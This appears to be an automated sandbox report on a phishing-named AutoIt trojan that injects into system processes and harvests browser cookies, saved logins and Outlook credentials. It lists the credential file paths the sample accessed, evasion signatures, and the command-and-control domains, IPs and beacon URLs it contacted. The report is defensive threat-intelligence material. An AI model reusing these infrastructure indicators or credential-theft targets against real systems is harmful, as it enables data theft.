            Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00090B62
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00091663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00091663
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: URGENT REQUEST FOR QUOTATION.exe, iadfuWOlEqeEML.exe, 00000005.00000000.1997500664.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4129288938.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000000.2149673746.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: iadfuWOlEqeEML.exe, 00000005.00000000.1997500664.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4129288938.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000000.2149673746.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: iadfuWOlEqeEML.exe, 00000005.00000000.1997500664.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4129288938.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000000.2149673746.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: iadfuWOlEqeEML.exe, 00000005.00000000.1997500664.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4129288938.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000000.2149673746.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00050698 cpuid 0_2_00050698
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_000A8195
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0008D27A GetUserNameW,0_2_0008D27A
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0006BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0006BB6F
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: WIN_81
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: WIN_XP
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: WIN_XPe
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: WIN_VISTA
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: WIN_7
            Source: URGENT REQUEST FOR QUOTATION.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_000B1204
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_000B1806
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials12
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1547643 Sample: URGENT REQUEST FOR QUOTATION.exe Startdate: 02/11/2024 Architecture: WINDOWS Score: 100 28 www.weatherbook.live 2->28 30 www.timetime.store 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 9 other signatures 2->48 10 URGENT REQUEST FOR QUOTATION.exe 1 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 iadfuWOlEqeEML.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 notepad.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 iadfuWOlEqeEML.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 linkwave.cloud 15.197.225.128, 50027, 50028, 50029 TANDEMUS United States 22->34 36 queima.shop 84.32.84.32, 50035, 50036, 50037 NTT-LT-ASLT Lithuania 22->36 38 6 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            URGENT REQUEST FOR QUOTATION.exe68%ReversingLabsWin32.Trojan.AutoitInject
            URGENT REQUEST FOR QUOTATION.exe100%AviraDR/AutoIt.Gen8
            URGENT REQUEST FOR QUOTATION.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bqberw.vip
            3.33.130.190
            truetrue
              unknown
              queima.shop
              84.32.84.32
              truetrue
                unknown
                crowsecurity.cloud
                3.33.130.190
                truetrue
                  unknown
                  weatherbook.live
                  3.33.130.190
                  truetrue
                    unknown
                    technew.shop
                    45.56.219.238
                    truetrue
                      unknown
                      linkwave.cloud
                      15.197.225.128
                      truetrue
                        unknown
                        www.technectar.top
                        199.192.21.169
                        truetrue
                          unknown
                          www.dverkom.store
                          31.31.196.17
                          truetrue
                            unknown
                            www.cc101.pro
                            188.114.97.3
                            truetrue
                              unknown
                              rjscorp.org
                              3.33.130.190
                              truetrue
                                unknown
                                www.bayarcepat19.click
                                188.114.97.3
                                truetrue
                                  unknown
                                  www.thegardenlab.net
                                  34.92.248.216
                                  truefalse
                                    unknown
                                    multileveltravel.world
                                    3.33.130.190
                                    truetrue
                                      unknown
                                      www.linkwave.cloud
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.queima.shop
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.dxeg.lol
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.weatherbook.live
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.crowsecurity.cloud
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.bqberw.vip
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.timetime.store
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.technew.shop
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.multileveltravel.world
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.rjscorp.org
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.technectar.top/ghvt/?InQ=LTjEQRzJtYpWLPC0PWhno4Odjb6ancq35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4ns4hEFcPU5cg3ajV68ZqrtcUBFUChNwT6XQ=&4b0dM=fDYPFtrue
                                                            unknown
                                                            http://www.linkwave.cloud/l8vr/true
                                                              unknown
                                                              http://www.crowsecurity.cloud/8y34/?InQ=XU1sh1XtMideJdcjjw9tv1ce3F6q0wR2gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iOxsMANTT8niAScqb+QYTNo3dZz3Qq1EvsPg=&4b0dM=fDYPFtrue
                                                                unknown
                                                                http://www.weatherbook.live/0fox/true
                                                                  unknown
                                                                  http://www.technew.shop/cqvc/true
                                                                    unknown
                                                                    http://www.bayarcepat19.click/5hcm/true
                                                                      unknown
                                                                      http://www.crowsecurity.cloud/8y34/true
                                                                        unknown
                                                                        http://www.queima.shop/ka9h/?InQ=SBEzZAFI6R+MuXMHep45hveg8475zASMotQq88crLJjLaeo0XbFH+bdZbQqsHZwXBgGMZiEh6f1TBI/WO30Y7KSm1k/3EoEdIY5bKrw0daRcPqXkB0ATUTg=&4b0dM=fDYPFtrue
                                                                          unknown
                                                                          http://www.technew.shop/cqvc/?4b0dM=fDYPF&InQ=x6i2VaY/COe6YJbCm7hgmslThhj3HERMoqMF/kViJh7LTEfNCvLkasLfb6R400f5ycdhyFaSyEdZONyfMQ03m7/g21IBXRRsU6NOr6wuD6OEnaTkSZEbttE=true
                                                                            unknown
                                                                            http://www.bqberw.vip/ezjb/?InQ=l3Sp86LdHQK51JyL57ZHZ2codxeMI4L2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIR1r1RIPPBE5LFNr96UmDzREVcd4mJJ6hoQo=&4b0dM=fDYPFtrue
                                                                              unknown
                                                                              http://www.rjscorp.org/a0tq/true
                                                                                unknown
                                                                                http://www.cc101.pro/9apq/?InQ=LHjDDAx19xzpDFr7DCXHGx3Itg+TAVeOcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3icgk1As8EJsNFlQOYCfqBIjmoJeJzbnATgI=&4b0dM=fDYPFtrue
                                                                                  unknown
                                                                                  http://www.dverkom.store/66j2/?4b0dM=fDYPF&InQ=HppDh2G+RtpfmDCc4FqHfw3lMYrNZu7sBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpROVjuIMxlXfhlP5y3R3WlUeQ7oHwEkw80jU=true
                                                                                    unknown
                                                                                    http://www.thegardenlab.net/ukg6/?InQ=D9wM5xDL/q3TI2g2vD4UiiybpTRhluIicjQPF53/huNm+8guGd31VA7hAVYl0bGFbVNx83u8duJjtMB4AC+GThc54L4vcaEMqaTD3FORm4ZRpAFMFX0j2sk=&4b0dM=fDYPFfalse
                                                                                      unknown
                                                                                      http://www.technectar.top/ghvt/true
                                                                                        unknown
                                                                                        http://www.weatherbook.live/0fox/?InQ=4CzKvyikl1JmGr8xOweoExseK3jSsW+NmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwPvDloADmDN4KAHnmSf5T9qbzaKMNsg1yiE4=&4b0dM=fDYPFtrue
                                                                                          unknown
                                                                                          http://www.dverkom.store/66j2/true
                                                                                            unknown
                                                                                            http://www.multileveltravel.world/kdfx/?4b0dM=fDYPF&InQ=eNDgnj/WfiIi0tdhycbCw+iXO8euh2ZcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZW0B0X+kPjhgk6HpPnQraaSGImvIvXcettGI=true
                                                                                              unknown
                                                                                              http://www.queima.shop/ka9h/true
                                                                                                unknown
                                                                                                http://www.multileveltravel.world/kdfx/true
                                                                                                  unknown
                                                                                                  http://www.bayarcepat19.click/5hcm/?InQ=tP3kAkfnE7i1YCC4WEIWdKvNUvpS22y5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUkjVwGn+C/bAHUZtb03BGjpac+p+rsaDZJI6Y=&4b0dM=fDYPFtrue
                                                                                                    unknown
                                                                                                    http://www.thegardenlab.net/ukg6/false
                                                                                                      unknown
                                                                                                      http://www.cc101.pro/9apq/true
                                                                                                        unknown
                                                                                                        http://www.rjscorp.org/a0tq/?InQ=NgVUtP9hB7Edi5xskNDunaeCW7f91G+gHsaEhqzqxE1iqkI06nxaFE271iDw3agr7prg6niclQPaHXiPhdgPCPpSuEPqLxH/sZvl8OJdgUd2EHHS19jqltw=&4b0dM=fDYPFtrue
                                                                                                          unknown
                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                          https://duckduckgo.com/chrome_newtabnotepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://duckduckgo.com/ac/?q=notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.iconotepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.technew.shopiadfuWOlEqeEML.exe, 00000008.00000002.4131591003.000000000521E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://156.226.108.99:28888/notepad.exe, 00000006.00000002.4130391348.0000000005A8A000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.000000000362A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://www.ecosia.org/newtab/notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://ac.ecosia.org/autocomplete?q=notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://www.bayarcepat19.click/5hcm/?InQ=tP3kAkfnE7i1YCC4WEIWdKvNUvpS22y5K3aSOloco8KmCG1xGxL66P/sVWpnotepad.exe, 00000006.00000002.4130391348.00000000063F6000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.0000000003F96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnotepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://www.aapanel.com/new/download.html?invite_code=aapanelenotepad.exe, 00000006.00000002.4130391348.00000000068AC000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.000000000444C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=notepad.exe, 00000006.00000003.2318881109.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    15.197.225.128
                                                                                                                    linkwave.cloudUnited States
                                                                                                                    7430TANDEMUStrue
                                                                                                                    199.192.21.169
                                                                                                                    www.technectar.topUnited States
                                                                                                                    22612NAMECHEAP-NETUStrue
                                                                                                                    34.92.248.216
                                                                                                                    www.thegardenlab.netUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    188.114.97.3
                                                                                                                    www.cc101.proEuropean Union
                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                    31.31.196.17
                                                                                                                    www.dverkom.storeRussian Federation
                                                                                                                    197695AS-REGRUtrue
                                                                                                                    45.56.219.238
                                                                                                                    technew.shopCanada
                                                                                                                    13768COGECO-PEER1CAtrue
                                                                                                                    84.32.84.32
                                                                                                                    queima.shopLithuania
                                                                                                                    33922NTT-LT-ASLTtrue
                                                                                                                    3.33.130.190
                                                                                                                    bqberw.vipUnited States
                                                                                                                    8987AMAZONEXPANSIONGBtrue
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1547643
                                                                                                                    Start date and time:2024-11-02 19:57:09 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 10m 6s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:9
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:URGENT REQUEST FOR QUOTATION.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@16/8
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 75%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 96%
                                                                                                                    • Number of executed functions: 43
                                                                                                                    • Number of non-executed functions: 301
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target iadfuWOlEqeEML.exe, PID 3444 because it is empty
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • VT rate limit hit for: URGENT REQUEST FOR QUOTATION.exe
                                                                                                                    TimeTypeDescription
